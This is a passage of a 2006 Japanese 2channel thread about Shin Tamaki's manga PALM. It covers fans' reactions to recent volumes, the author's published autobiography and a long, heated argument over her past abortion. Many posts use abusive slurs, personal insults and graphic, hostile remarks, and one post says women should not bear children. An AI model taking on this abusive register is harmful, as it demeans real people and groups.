一切聞いたことがありません。

「私の息子がミュージシャンになりたいから!」
「私は外国人になるため、一切日本食わなかった!」云々言って

オーストラリアへ移住宣言、速攻帰国した、
この「英語の全然できない”純・日本人婆”」って、何ですか?

141 :花と名無しさん:2006/11/01(水) 10:17:30 ID:???0
悪く取らないでほしいが一切日本食わなかったって何だ?
日本食食わなかった?

142 :花と名無しさん:2006/11/01(水) 10:24:22 ID:???O
多分そうだろ。

それにしても、最近は作者の宗教がかった思考や振る舞いの悪い部分だけが目につくなあ。

143 :花と名無しさん:2006/11/01(水) 10:52:59 ID:FovJo/c00
>>141
自伝のページのどこか。

自分が日本人ではありたくないために」、
日本食を一食わなかったと。

あのな・・・・ 「日本食やめれば外国人になれる」  という錯覚をする前に   

””自分は日本人以外の何物でもない””    
者として、  

実際に少しでも
海外に住むべきだったな。貧乏でも方法はいくらでもあったはず。

・・・たとえば今ハワイ好き日本人、この上無く滑稽。

オアフ島 以外の 島 のド田舎 では我々日本人は、 
超超超嫌われ〜〜〜〜軽蔑〜〜〜〜・・・・・・以下略

144 :花と名無しさん:2006/11/01(水) 11:27:15 ID:???0
だから140みたいなのがいるからね。HPでの個人経歴はほどほどに
した方が良いんだけど。
作品に自分を投影しても青また青みたいに面白い作品もあるし
作品さえ充実してればいいんだけど
どうも自分の経歴とリンクした「ネタ」が浮いてしまっているというか
そういうのは軽々しく口に出さずに、作品として昇華させるべきだ。


145 :花と名無しさん:2006/11/01(水) 12:28:59 ID:???0
>>140
なんか恨み骨髄みたいで気色悪いわ。
なにが
>誰か書いてくださいな。
だよ。何を知ろうと嫌いにしかなりたくないくせに。

146 :花と名無しさん:2006/11/01(水) 12:52:48 ID:???O
>>140みたいなのは真性ドキュソだからほっとくとして、最近の作者に対して不満を
感じている人が自分以外にもけっこういたんで驚いている。

147 :花と名無しさん:2006/11/01(水) 14:37:07 ID:???0
>>145
>>140は批判派叩きを狙ったあからさまな釣りだろ

148 :花と名無しさん:2006/11/01(水) 14:38:25 ID:???0
個人情報さらけ出すことがカコイイ! 非凡なワタシカコイイ!てのは
あの世代特有の勘違いではある。その意味で、平凡すぎて萎え。

149 :花と名無しさん:2006/11/01(水) 14:50:23 ID:???O
>>148
うん。作品だけで十分にカコイイと思っていたのにねぇ。(´Д`)

150 :花と名無しさん:2006/11/01(水) 15:57:38 ID:???O
好きな作家の私生活は、みだりに覗くもんじゃないな
一切見てないんで、午前の光もわりと楽しめたな。複数キャラによる多角的な視点が、いささか失われてるが・・・
最後のネロの台詞は、まだ幾らか残ってる部分じゃない?

151 :花と名無しさん:2006/11/02(木) 16:23:32 ID:???O
そういえば、シリーズ完結予定は何年後だったっけ? スケジュール通りに進んで
いるのかな?

152 :花と名無しさん:2006/11/06(月) 11:34:54 ID:???0
2011年だったと思う。たぶん。
作中ではラストが2009年のはずですね。
トランシーバーがでっかい時代から
地デジ時代までいくのかーと思うとすごいっすね。

153 :151:2006/11/06(月) 16:42:53 ID:???O
ありがとうございます。5年かあ。長いような短いような。

154 :花と名無しさん:2006/11/07(火) 00:56:36 ID:???0
豚切りスマソ。

パーム26巻(愛でなくの完結巻)だけ持ってないんだ。
文庫になるまで待てないので、どなたか教えてくださいませんか?お願い!

黒い男やライオンは何だったのか?
シドとジェームズはどうして別れたのか? だけで結構ですから。

155 :花と名無しさん:2006/11/07(火) 01:47:06 ID:???0
>154
とっくに文庫になってますが何か

156 :花と名無しさん:2006/11/07(火) 07:51:34 ID:???0
なんにも説明なかったんじゃなかったっけ黒男や獅子
シドもなんか意味不明で別れた。作者都合だろ。

157 :花と名無しさん:2006/11/07(火) 09:59:52 ID:???O
シドには「荷が重すぎた」って感じかな?

あの物語の登場人物たちってエスパー並に察しが良いから、読者が意味不明な行動を
すること多いよね。

158 :花と名無しさん:2006/11/07(火) 18:02:34 ID:???0
シドはジェームスに惚れてるけど、今の時点で
彼と人生を分かち合いたいとは考えていない。
(彼女にとって人生の第一義は教育学だし)
ジェームスもそれを重々承知している、ということでしょ。
まぁ2人にとってあの日々は人生からのプレゼントってことで。

159 :花と名無しさん:2006/11/07(火) 18:36:56 ID:???0
皆様ありがとう。2ch見てよかった。
密林に文庫注文しました。

自分が好きなキャラはローダ・キャラハン(世界の方のマクシーではなく)
フロイドです。

160 :花と名無しさん:2006/11/07(火) 20:48:15 ID:???0
午前の光3巻げっど。
色々言われてるけど、

79ページ2コマ目の、カーターに対して感情をこぼしそうになるのをグッと
押し留めているジェームスと、
130ページ2コマ目の、カーターを嬉しそうに見るジェームスがとても好きなので、
他は全て許せる気持ちになってしまった。

やっぱり私は、ジェームスとカーターの関係性が好きで読んでるんだと実感したよ。


161 :花と名無しさん:2006/11/08(水) 08:25:51 ID:???0
妄想ネタにできる一コマがあれば他はALL無視可って腐女子思考乙


162 :花と名無しさん:2006/11/08(水) 10:14:19 ID:???O
げっど乙

163 :花と名無しさん:2006/11/08(水) 11:20:42 ID:???0
>>161
いいんじゃないかなぁ。
つまらんつまらんと言いながら読むより、
好きな部分があって読んでる方が。

つかまったく腐の耐性が無きゃ結構読むのキツイよ。
パーム。

164 :花と名無しさん:2006/11/08(水) 19:13:33 ID:???0
>>163
昔のパームは、そんなんじゃなかった・・・そう、言わば芸術


ここまで、いいきれば無問題

165 :花と名無しさん:2006/11/08(水) 20:38:17 ID:???0
NOT LOVE, But Affection

166 :160:2006/11/08(水) 21:18:08 ID:???0
腐の妄想とはまた違う、絶対的な信頼感が好きなんだ>カーターとジェームス

腐れ妄想ができるマンガはいくらでもあるけど、
この二人はちょっと特別だな。
「今こそあんたが必要だ」の一連のくだりは、
『あるはずのない海』の「親を殴ったような気がする」をちょっと思い出した。

質が下がったのは認めるけど、
「やっぱり好きだな」と思える部分も残ってるよ。

167 :花と名無しさん:2006/11/09(木) 00:50:25 ID:???0
ねーねー、ジョゼって未来が見えるのに
なんで堕胎したの?
他人の死ぬ瞬間まで見通せるのに
自分の妊娠ぐらい絶対に解ったはずでしょ。

つまりジェームズが人殺しをやったから、
自分も同じく人殺しになるために、わざと堕胎したってこと?

168 :花と名無しさん:2006/11/09(木) 11:02:47 ID:???O
つ作者の自己弁護のため

169 :花と名無しさん:2006/11/09(木) 11:13:14 ID:???0
この人のあり方を見てると、
実体験は語りすぎない方がいいって痛感する。
物語を作る人はサイト作っても日記や略歴は省く方が絶対に良いと思った。

170 :花と名無しさん:2006/11/09(木) 14:22:14 ID:???0
堕胎なんて人の親になってる人なら1度やそこらやってるんじゃないのか?


171 :花と名無しさん:2006/11/09(木) 14:40:57 ID:???O
>>170
君や君の母親の経験が世の中の標準じゃないから。男を見る目がなく、避妊もせずに
妊娠した挙げ句に胎児を殺すなんて誰でもやってることじゃないだろ。

172 :花と名無しさん:2006/11/09(木) 16:26:22 ID:???0
普通に恋愛してれば妊娠も経験することもあるだろうけど
望まなければ中絶もするだろうし、
女性の体に負担がかかるから気をつけるべきなんだろうけど、普通の生活の営みじゃん。
それを漫画で取り上げるのはなんだか自己満足なようでシラケル。



173 :花と名無しさん:2006/11/09(木) 16:52:57 ID:???O
遊びのセクースで妊娠する女、させる男は共に馬鹿だろ。特に女の受けるダメージは時には
命に関わるんだから。

174 :花と名無しさん:2006/11/09(木) 18:44:31 ID:???0
>>172
避妊しないの?
私は堕胎ってすごくキツイし怖いことだと思う。
堕胎が恋愛や人生につきものみたいな神経は理解しがたい。

175 :花と名無しさん:2006/11/09(木) 19:48:57 ID:???0
リプロダクティブ・ヘルス・アンド・ライツ

176 :花と名無しさん:2006/11/09(木) 21:15:55 ID:???0
堕胎なんかあたりまえに皆してる、とか言われるとマジで寒気するから
やめて。どういう生活層にいるの?異次元住人だよ>>170

177 :花と名無しさん:2006/11/09(木) 21:31:31 ID:???O
普通の生活の営み=堕胎


典型的なDQNの思考です。本当にありがとうござい(ry

178 :花と名無しさん:2006/11/09(木) 22:37:28 ID:???0
>望まなければ中絶
(((;゚Д゚)))ガクガクブルブル…

179 :花と名無しさん:2006/11/09(木) 22:51:53 ID:???0
妊娠とか中絶は個人的な問題で漫画で言うべきことじゃないな。



180 :花と名無しさん:2006/11/10(金) 00:50:41 ID:???0
勝てば官軍 負ければ賊軍
全てはクモモン以降の出来次第ってか。

終幕に向けて、倫理観とか作者個人なんかどうでもいいってくらい
鬼気迫る狂気めいたPALMが読んでみたい。

181 :花と名無しさん:2006/11/10(金) 01:16:32 ID:???0
作者の狂気が感じられるだけってのもやだな。


182 :花と名無しさん:2006/11/10(金) 01:39:09 ID:???0
>>181
どこにも作者の狂気なんて書いてない。

183 :花と名無しさん:2006/11/10(金) 02:25:13 ID:???0
むしろ狂うほど描いて欲しい

184 :花と名無しさん:2006/11/10(金) 03:04:49 ID:???0
>>174
禿同。レイプで出来た子以外は堕胎しちゃマズイでしょ。
考え無しで妊娠して「堕ろしゃいいや!」と考える女って本当に怖い。

でも、「レイプで出来た子供であっても堕胎禁止」という法の州や国はもっと怖い。

レイプ被害者の堕胎禁止法を支持する男ってさ、
自分の娘や妻が他の男にレイプされて、それで生まれた子を愛せるわけだね?
子供に罪は無いと割り切り、自分がその子を養育し、
仲良く平和な家庭を築けるんだよね?

185 :花と名無しさん:2006/11/10(金) 03:09:39 ID:???0
すれち

186 :花と名無しさん:2006/11/10(金) 03:59:15 ID:???0
>>184
すれちでスマソだけど、
レイプで出来た子は、(以前のアイルランドとかでは)施設とか養子に出すのが通例だったよ。
当時は、それでも生みたくなくて(非カトリック国の)英国に中絶遠征にくる被害者がいて、
いろいろと問題化されてた。(今はアイルランドの中絶禁止法、変わったのかもしれないけど…。
何年か前、私が英国に住んでた頃の話)。
望まない妊娠でも、受精したからにはそれは既に独立した命だから、
親が誰だとか、親の意志とか関係なく、
子宮を器として、世の中に送り出すのが義務、みたいな感じなのかね〜。
個人の倫理観と、宗教的/社会的な倫理観との擦り合わせができない国とか環境もアレだな、と思った。

187 :花と名無しさん:2006/11/10(金) 04:40:40 ID:???0
>>186
施設とか里子って・・・酷いな・・・。酷い施設の現状記事読んだよ。

別にスレ違いの話題でもないでしょ。
作者が堕胎経験を語りたくてしょうがないんだし、
主人公は近親レイプの産物。ありえない奇跡の物語。

188 :花と名無しさん:2006/11/10(金) 06:31:38 ID:???0
堕胎しなければならない事情やしてはならない事情とかがあるから
あんまり軽々しくいいの悪いのとは言えないかなとは思うよ。
>>170>>172みたいな白痴は論外として。

まあスレ的な意味での問題は「堕胎行為」自体の是非とかじゃなく、
堕胎経験に「自己陶酔する行為」のキモさなんだけどね。



189 :花と名無しさん:2006/11/10(金) 11:38:03 ID:???0
登場人物のあり方について論じるならスレの範囲内だけど、
レイプ妊娠堕胎の良し悪しについての結論なんか専門の人にだって出せてないのに、
ここで語ってもしょうがない。
法制度についてまでここでやられたらいくらなんでもスレ違いでしょう。

それに作者個人の経験があるとはいえ、
登場人物がどうしたから作者がそれを全肯定したと受け取るのもおかしいよ。


190 :花と名無しさん:2006/11/10(金) 11:39:59 ID:???0
かき方おかしかった。
>レイプ妊娠堕胎の良し悪し
「レイプされて妊娠して堕胎するか生むか」
てことです。

191 :花と名無しさん:2006/11/10(金) 13:21:07 ID:???0
>>189
すぐ上でとっくに言われてますがなそんなこと

192 :花と名無しさん:2006/11/10(金) 15:07:28 ID:???0
それじゃ賛同意見ってことにしといて。

193 :花と名無しさん:2006/11/11(土) 12:58:07 ID:???0
170だけど、まぁ言葉が足りなさ杉だったんだけど
望まない妊娠って男女が一緒にいればおかしやすい間違いでしょ。
男性も子作りに関わってるのになんで女性だけが罪悪感なんて負担背負わなきゃ
いけないのか。中絶を重く受け止めすぎてるからじゃない。
だからって短絡的に避妊もせず、妊娠したら中絶すればいいって言ってるんじゃなく、
中絶がどのくらい体に負担がかかるかは知っておくべきだけど、
生活の一部として受け止めて前向きに生きろっていうこと。

産んだ子供に対してできなかったことを悔やむのはわかるけど
中絶した胎児に対しての罪悪感とか、宗教じみた寒さを感じる。
それは個人で処理すべきことで漫画で言うことではないと思う。









194 :花と名無しさん:2006/11/11(土) 14:31:23 ID:???0
私事を作品に投影するのってそんなに嫌かなぁ。
私小説という分野もあるくらいだし
この人はそういう作風なのだ、と受け止めてるよ。
それでパームの世界観が、HP開設前にくらべて
大きく損なわれたとは感じないな。
「青また青」なんかで耐性が出来てるのかもしれないけど。

>193

言わんとする事は理解できるけど、なんでも簡単に宗教じみたなんて
書き方するのはどうだろう。

195 :花と名無しさん:2006/11/11(土) 15:44:02 ID:???0
「中絶を前向きに生活の一部に」って……





( ゚Д゚)ポカーン

196 :花と名無しさん:2006/11/11(土) 17:37:06 ID:???0
中絶は「命のもと」を絶つのではなく
すくすくと育ちつつある「命」を絶つもので、充分罪悪感を持って当然の行為

指の大きさくらいの胎児が、指しゃぶりしたり
母体や外界の声に反応して動いたりしているのを見たことないのかな・・・・・・

ジョゼの意識は妥当なんでは?
漫画にすることに何か問題でも?
罪悪感感じない読者に響けば儲けもの

197 :花と名無しさん:2006/11/11(土) 19:48:07 ID:???O
>>193
おまえが基地害なのはよくわかったからもう出てくるな。

198 :花と名無しさん:2006/11/11(土) 20:40:33 ID:???0
中絶が生活の一部って、どんな所得層の話なんだろう……ていうか
それほんとうに日本での話?>>170

199 :花と名無しさん:2006/11/11(土) 21:17:53 ID:???0
世の中には避妊してくれない男もいるから、女ばかりが
後ろ指さされるのはかなわん!て理屈か?















一生言ってろ

200 :花と名無しさん:2006/11/11(土) 22:11:41 ID:???0


    ⊂⊃   ☆.。.:*・゜☆. .。*:。.
 (ヽ..∩_∩ ./             :。
 (ヾ ( ・(エ)・)/     仲良くなーれ:*゚
 .//( つ  つ    。:*゚゜
 (/(/___|″    ゚*:。.*:。.。.:*・゜☆
   し′し′



201 :花と名無しさん:2006/11/11(土) 22:58:06 ID:???0
みんな>>170に釣られ杉だよ!
そもそも>170みたいな池沼がパームシリーズの台詞を
読めるはずないもの。中絶の単語に吸いついてきた、
ただの嵐だよ。

202 :花と名無しさん:2006/11/12(日) 09:19:21 ID:???O
まあ>>170は釣りか真性DQNだよな。とりあえず>>170は中絶手術の時に胎児が器具から
逃げようとした挙げ句に掻き出される写真を携帯の待ち受け画面にでもしてろ。外部の
声に反応するくらい成長した胎児は、手足を切り刻まれ、頭を潰されて掻き出される
わけだが、そんなことを「当たり前」にしたくネーヨ。


203 :花と名無しさん:2006/11/12(日) 13:08:18 ID:???0
スレ違い。


204 :花と名無しさん:2006/11/12(日) 13:20:16 ID:???0
作者が自己陶酔して語ってる時点でスレ違いじゃなくなってしまったわけだが。

205 :花と名無しさん:2006/11/12(日) 13:20:26 ID:???O
>>203
作者乙

206 :花と名無しさん:2006/11/12(日) 13:23:27 ID:???O
>>203
そもそも作者自身が作品その他で語ったりテーマのひとつにしていることから発生した
話題ですが、何か?

207 :花と名無しさん:2006/11/12(日) 14:48:37 ID:???0
作品そのものになら、面白くなくなったとかいくらでも語れるけど、
作者の人となりを夢想してまで叩くのには興味湧かない。
そこまで作者にヘンに惚れ込んで焦がれなくてもええやん。

208 :花と名無しさん:2006/11/12(日) 14:59:37 ID:???O
>>207
君に読解力がないのは良くわかったから。

209 :花と名無しさん:2006/11/12(日) 15:00:15 ID:???0
>焦がれる


( ゚Д゚)ポカーン
何か他の人と違うものが見えてる人でしょうか……?>>207

210 :花と名無しさん:2006/11/12(日) 15:45:56 ID:???O
「青また青」を読んだ時は、作者自身の体験が元になっていると思い「色々と苦労
したんだなあ」と考えて「パーム」がますます好きになったけど、その後に作者が
「男を見る目も避妊の知識もない小娘の頃に、妊娠して胎児を始末した」ということを
自分から書いているのを読んで色々な意味で萎えた。

211 :花と名無しさん:2006/11/12(日) 16:08:37 ID:???0
ハゲド
青また青の頃は実体験を……と聞いてもわりと受け容れられたというか
むしろ作者に同感すらしたのに。

212 :花と名無しさん:2006/11/12(日) 18:01:15 ID:???0
厳しいこと言ってもパームほんとに好きな人は間違っても作者を叩くなんて
ことはしないよなぁ。


213 :花と名無しさん:2006/11/12(日) 18:02:36 ID:???0
中絶のことは作者本人に隠す気がないだけだと思う。
特に干渉や自己憐憫に浸ってるとも思わない。
挫折や過ち、もしくは罪ではあったとしても、恥ではないでしょう。
非難している方々にはそういう意識が多分にあるんじゃないかな。
全部をひっくるめて非難している方も、それが返す刀になるって分かってるのかな。
中絶がいけないっていうなら人工授精は?
あれは受精させた卵の中からいくつかを選んで子宮に戻すよ?
残され廃棄される卵は命じゃない?
女である限り私は彼女を断罪できない。

214 :花と名無しさん:2006/11/12(日) 18:03:30 ID:???0
中絶のことは作者本人に隠す気がないだけだと思う。
特に干渉や自己憐憫に浸ってるとも思わない。
挫折や過ち、もしくは罪ではあったとしても、恥ではないでしょう。
非難している方々にはそういう意識が多分にあるんじゃないかな。
全部をひっくるめて非難している方も、それが返す刀になるって分かってるのかな。
中絶がいけないっていうなら人工授精は?
あれは受精させた卵の中からいくつかを選んで子宮に戻すよ?
残され廃棄される卵は命じゃない?
女である限り私は彼女を断罪できない。

215 :花と名無しさん:2006/11/12(日) 18:12:34 ID:???0
あ、ごめんなさい重複した。

216 :花と名無しさん:2006/11/12(日) 19:17:48 ID:???0
女であるかぎり断罪できないだってプ
>>170は痛いなあ……

217 :花と名無しさん:2006/11/12(日) 20:42:45 ID:???0
>>212
少なくとも作者を“叩いて”いる人はいないでしょ。そう勘違いしてファビョってる
>>170みたいな痛い人はいるけど。

>>213
とりあえず最低でも中学生レベルの読解力を身につけてから出直してくれば?

>中絶のことは作者本人に隠す気がないだけだと思う。

誰も作者が隠していたなんて話はしてないだろ? 過去スレは当然だけど、そもそも
作者のWebとかちゃんと読んだのか? それに罪だとか恥だとかいうレベルの話でもない。
Webや最近の作品での発言、表現を“痛い”と感じ、ちょっと引いている読者がけっこう
いたというだけの話。ましてや誰も人工授精の話などしていない。受精卵を引き合いに
出しても、すでに苦痛を感じるレベルの胎児をバラバラにして掻き出すという堕胎の
本質が変わる訳でもない。それから、勝手に女性代表にならないでくれ。男の自分から
見ても不愉快だ。同じ人の親として、作者が息子に対して感じる愛情の深さ、かつて
自分が殺してしまった“生まれてくることができなかった命”に対する愛と悲しみは
理解できる。しかし、だからと言って若い頃の彼女の行動があまりにも愚かだったと
いうのは、どうオブラートに包んでも誤魔化しようのない事実だよ。

218 :花と名無しさん:2006/11/12(日) 21:54:35 ID:???0
>>213
>女である限り私は彼女を断罪できない。

すべての女性があなたみたいな非常識な存在だと誤解されるのは大迷惑です。

219 :花と名無しさん:2006/11/12(日) 22:35:19 ID:???0
今年の裏流行語大賞

「堕胎なんて人の親になってる人なら1度やそこらやってるんじゃないのか?」

220 :花と名無しさん:2006/11/12(日) 23:33:16 ID:???0
>217
>出しても、すでに苦痛を感じるレベルの胎児をバラバラにして掻き出すという堕胎の
>本質が変わる訳でもない。それから、勝手に女性代表にならないでくれ。男の自分から
この表現がすでに痛いんだけど。。。
2、3ヶ月なんて人間以前じゃない。この世に生まれなかったらそれはそれだし、
中絶が作者に限ったことではないし、現実生きてる人間対象じゃないところが
宗教やってる人に通ずる常識が外れたところだ。

作者の中絶なんてどうだっていいのに作品に持ち込むところがズレてんだよな。



221 :花と名無しさん:2006/11/12(日) 23:50:20 ID:???0
>220
>作者の中絶なんてどうだっていいのに作品に持ち込むところがズレてんだよな。
そもそも作者自身が作品に持ち込んできてるのが原因だろ。
お前のほうがズレてるよ。

222 :花と名無しさん:2006/11/12(日) 23:59:04 ID:???0
つーかさ、「この世で絶対なもの、それは妊娠か死か」
という言葉がこの作者のスタンスだろ。ただ”絶対”が
良いとも悪いとも言ってない。

パームの最終話のタイトルに自分の息子の名前をつけるほど
子供が人生の最重要物件なんだろう。だからこそ堕胎した子の
「顔が見たい」のだろ。そのへんはイライザに投影してる。

223 :花と名無しさん:2006/11/13(月) 00:14:10 ID:???0
作者が本当は子供を産みたかったなら執着してるのはうなずける。

224 :花と名無しさん:2006/11/13(月) 00:19:01 ID:???0
<<222
「絶対」ではなくて「完全」ではなかったか?

225 :花と名無しさん:2006/11/13(月) 00:22:17 ID:???0
>>224
絶対だったよ。青また青の主人公のセリフ。

226 :花と名無しさん:2006/11/13(月) 00:26:05 ID:???0
あ、ごめん「完全」だった!

227 :花と名無しさん:2006/11/13(月) 00:43:06 ID:???0
こう堕胎が話題になるのは、例のドラマの影響もあるんじゃない?
別板では大騒ぎだし。私は見たことないけど。

義務教育も終えておらず、労働能力もないのに
子供産むと言い張る中学生の話。命の大切さを訴えるつもりで
産んだ後の養育費とかの現実問題は放置するドラマらしいよ。

228 :花と名無しさん:2006/11/13(月) 06:49:42 ID:???0
気持悪いなーこの流れ。
とにかく、パーム信者に「堕胎なんて人の親になってる人なら1度や
そこらやってる」と言い出す低教育層がまじってることに禿萎えだ。
パーム、ちゃんとお金出して買ってる?>170


流産した、とかなら生まれなかった子に執着とかもわかるんだけどね。
ほんと、なんかいろいろ萎えた。

229 :花と名無しさん:2006/11/13(月) 07:29:22 ID:???O
>>170>>220
まだいたのか釣り師。

230 :花と名無しさん:2006/11/13(月) 07:48:08 ID:???0
釣り師>>170>>220による今年の裏流行語大賞

「堕胎なんて人の親になってる人なら1度やそこらやってるんじゃないのか?」
「2、3ヶ月なんて人間以前じゃない」


>>228
>流産した、とかなら生まれなかった子に執着とかもわかるんだけどね。

もしくは、「近親相姦レイプの子だから堕胎しました」とかね。作品内では逆に
そういう子を生んで天才児に育っているあたり、作者の願望とかを反映していると
思ってます。

231 :花と名無しさん:2006/11/13(月) 07:58:10 ID:???O
>>228
170「万引きなんてマンガ読む人なら1度やそこらやってる」

232 :花と名無しさん:2006/11/13(月) 08:01:18 ID:???O
>>220は自分の肉親や友人が早期流産しても「2、3ヶ月なんて人間以前だから気にするな」
と励まします。

233 :花と名無しさん:2006/11/13(月) 08:51:41 ID:???0
釣りだよなぁ……でなけりゃほんとに人間の屑だ。

234 :花と名無しさん:2006/11/13(月) 09:27:25 ID:???O
まあ>>170>>220に「そうでないと困る理由」があるんじゃないか?

しかし、すべての女性を侮辱する発言だなー。「パーム」のファンにあんなのがいるとは。

235 :花と名無しさん:2006/11/13(月) 13:19:35 ID:???0
2chでしか発散できない可哀想なひとたち。

236 :花と名無しさん:2006/11/13(月) 13:47:14 ID:???O
>>235
捨てゼリフはいいから、もう消えなよ。

237 :花と名無しさん:2006/11/13(月) 13:52:01 ID:???O
>>235
確かに>>170>>220みたいに病的で歪んだ感情は、2ちゃんでしか発散できないよね。

238 :花と名無しさん:2006/11/13(月) 19:10:14 ID:???0
大丈夫!2chでしか発散できないクズもジェームスがカバーしてくれるはず!
サロニーでさえ拒まない器量なんだから!

239 :花と名無しさん:2006/11/13(月) 19:19:58 ID:???0
>器量

……もしかして、度量って言いたかったのかなあ……?

240 :花と名無しさん:2006/11/13(月) 20:59:21 ID:???0
器量……あーる・田中・い器量

241 :花と名無しさん:2006/11/13(月) 22:02:14 ID:???0
……もしかして、一郎って言いたかったのかなあ……?
つうのは冗談で。
>>239
「器量」でも、まるっきりまちがいとはいえないのよ。
ことばには、いくとおりものいみがあるの。
あまりほんをよんだり、じしょをひいたりしないのかもしれないけど。
あなたのしっていることだけが、しんじつですべてではないの。

242 :花と名無しさん:2006/11/13(月) 22:35:22 ID:???0
パームの台詞はリズムがいいから、
つい頭の中で音読してしまう

243 :花と名無しさん:2006/11/13(月) 22:56:20 ID:???0
>>241
あのさあ、言いたいことは分かるがあんたももう少し言葉を選んだら?

244 :花と名無しさん:2006/11/13(月) 23:26:23 ID:???0
やっと「午前の光」の2と3買ってきた。
連載時の印象よりずっと面白くて、嬉しいというか、安心した。
この話、星の歴史の頃の絵で見たかったなあとか、欲を言えばキリはないが
この密度でパームが読めるなら、それだけでいいや。

245 :花と名無しさん:2006/11/13(月) 23:42:10 ID:???0
>244
いいな、まとめ買い。
「午前の光」は雑誌で全部追ったけど、やっぱパームは
コミックス一気読みの方が、緊張感持続出来て良いやね。
「蜘蛛の〜」連載中は雑誌は極力我慢しようか…
けどそれだと年単位で待つ事になるのが…

246 :花と名無しさん:2006/11/14(火) 06:14:46 ID:???0
単行本が待ちきれなかった昔が懐かしい

247 :花と名無しさん:2006/11/14(火) 14:02:34 ID:???O
今は「あーっ、久しぶりに出てるのか」程度かな。

248 :花と名無しさん:2006/11/14(火) 21:20:56 ID:???0
単行本派だけど、小説が載る11月号は買っちゃうかも

249 :花と名無しさん:2006/11/18(土) 00:40:46 ID:???0
やっと単行本買ってきて、さっき読み終わった。
もういい加減諦めないと、この先何回ガッカリさせられるんだろう、と思ったよ…

ドラマらしいドラマもなく、気の利いた台詞ややりとりも片手で足りる程度、
前スレで父親の一件のネタバレ(雑誌バレ)を見ていても尚期待してたんだけど、
それもこれもグダグダだし。
全編マフィアも友人もJBJBとジェームス信者やってるだけの話だったなあ('A`)

作者の実生活なんか知ったこっちゃ無いけど、息子もとっくに自立してる年齢だろうし、
その分殊更に手の中に残った息子=JBに執着して作家としておかしくなってるのかな。
あくまで個人的感想だから、(作者以外で)気を悪くしたらごめん。
でも何というか、ここまでガッカリさせられると情けなくて涙も出ない気分だ…

250 :花と名無しさん:2006/11/18(土) 07:09:37 ID:???0
>>249
JBを現代のキリストにしたいんじゃないの? 醒めてきたのは自分も同じ。でも
これだけ長く付き合ってきたから、とにかく最後まで読む。

251 :花と名無しさん:2006/11/18(土) 07:45:00 ID:???0
>>250
私は親の都合でハワイで生まれ、本土・フランス・ドイツ・チェコ
スウェーデン・スイス・オーストリアを転々とし、17才で日本へ帰った。

オーストラリアで、わずかな期間だけ無責任に暮らしたこの作者に
キリスト教なんて100%理解できないよ。でも興味深いから本買ってる。

252 :花と名無しさん:2006/11/18(土) 07:54:06 ID:???0
>>250
追加。イタリアとスペインにも1年ずつ住んでた。
でもカトリックの国のことは、記憶から消えてしまうみたい。

253 :花と名無しさん:2006/11/18(土) 12:05:04 ID:???0
J.B.の父親については想像どおりだったんだが
実の姉を暴行の末に婦女暴行なのか、その逆なのかとか
具体的に考えると鬼畜度が増しますね。
どっちにせよ、イライザの身も蓋もない発言にアーサーがキレたのだろうなあ。

254 :花と名無しさん:2006/11/18(土) 18:25:02 ID:???0
>>251
伸さん本人がキリストにしたいと書いたわけでもないのに。
つか自分語り乙

255 :花と名無しさん:2006/11/18(土) 22:37:23 ID:???0
痛い作家のディープなファンは、痛いヤツという実例でしょうか?

256 :花と名無しさん:2006/11/18(土) 22:46:31 ID:???0
>>255
ファンにも見えない。
海外にいたのは自分の方が長いって言いたいだけかと思う。

257 :花と名無しさん:2006/11/18(土) 23:55:17 ID:???0
どこの国でも友達いなかったんだろうね…(´・ω・`)カワイソス

258 :花と名無しさん:2006/11/19(日) 06:09:25 ID:???0
つーかこの作者のエセ・エコロジストぶりに
ムカついている読者が多いんでしょ。

地球のためを思うなら、人間が絶滅するしかないのにさ。
こいつ平気でガキ産んだりおろしたり、ジェット機使って海外移住ごっこするくせに。

交通機関利用の前に、そもそも女なら、ヘアシャンプーやコンディショナーや
各種トリートメント剤やボディ用シャンプーやパック剤や化粧品を使って
ビシバシ下水にタレ流すでしょ。皆さん洗剤で洗濯して、いつも清潔でいたいでしょ。

皆さんだって他の女がそれで綺麗に清潔さを保っているのに、
自分だけが、それをしないで不潔で臭くてブサイクではいられないでしょ?

259 :花と名無しさん:2006/11/19(日) 07:14:24 ID:???0
>>258
わかったから地球のためにさっさと消えなよ。

260 :花と名無しさん:2006/11/19(日) 08:12:36 ID:???0
ケリーの台詞を全く理解していないことが分かった

261 :花と名無しさん:2006/11/19(日) 09:15:34 ID:???0
>>258 ホームラン級の馬鹿だな

262 :花と名無しさん:2006/11/19(日) 13:07:04 ID:???0
昔は、ジェームスがなんであんな殺され方をするのか、
本人も自覚してる過去の人殺しについて、司法の手にでもかかるのかな、と
思っていたけど、最近になって「エラぶってんじゃねえよ、てめえ何様だよ」
みたいな>258的草の根憎悪が、案外引き金になるような気がして来た。

263 :花と名無しさん:2006/11/19(日) 13:36:26 ID:???0
むしろ、本編に目を通してもいないのに
こんなマイナー作品のアンチやってるってのが珍しすぎる。>>258
本編読んだ上で言ってるなら、頭の弱さが哀れすぎる。

264 :花と名無しさん:2006/11/19(日) 14:53:21 ID:???0
伸さん洗浄物の類は自作してたよ。
写真も多分ノーメイクだ。

265 :花と名無しさん:2006/11/19(日) 14:59:56 ID:TTHfnNmy0
>>255
珍しいタイプですねあなた。

266 :花と名無しさん:2006/11/19(日) 15:39:18 ID:???0
伸スレにも低俗なのしかいなくなったね。。。。ほんとにまともなのは
2ch離れしてるんだね。


267 :花と名無しさん:2006/11/19(日) 15:57:42 ID:???0
作品については不満があっても、作者に対する誹謗中傷は許せないのね・・・

まあ、事実と全然違う認識に立って非難するのは、正当な事ではないけどね

268 :花と名無しさん:2006/11/19(日) 20:59:18 ID:???0
>>267
最近は叩きにしても、
自分の妄想のくせにそれに怒って作者叩いてるのが多い。

269 :花と名無しさん:2006/11/19(日) 23:20:13 ID:???0
まったくだ。「堕胎なんて人の親になってる人なら1度やそこらやってるんじゃないのか?」

270 :花と名無しさん:2006/11/19(日) 23:45:39 ID:???0
堕胎ネタしつこい……

271 :花と名無しさん:2006/11/20(月) 05:19:03 ID:???0
露骨な釣りネタにみんな食い付き杉(´・ω・`)

272 :花と名無しさん:2006/11/20(月) 07:14:15 ID:???0
だから人間の女は子供産んじゃダメだろが。
そうすれば地球は滅びない。

南米では人間のウンコ小便で
全河川が死んでるだろが。ねえ伸たまき。

273 :花と名無しさん:2006/11/20(月) 09:49:02 ID:???O
つまりだ、JBみたいなエスパーでも出てこない限り、人類はもうすぐ滅びるってこった。

274 :花と名無しさん:2006/11/20(月) 13:01:28 ID:???0
すっかり駄目になった作家のスレってなんか似てるな
作品を批判するならともかく作品とは全く関係のない
作家の私生活について叩きまくるとか
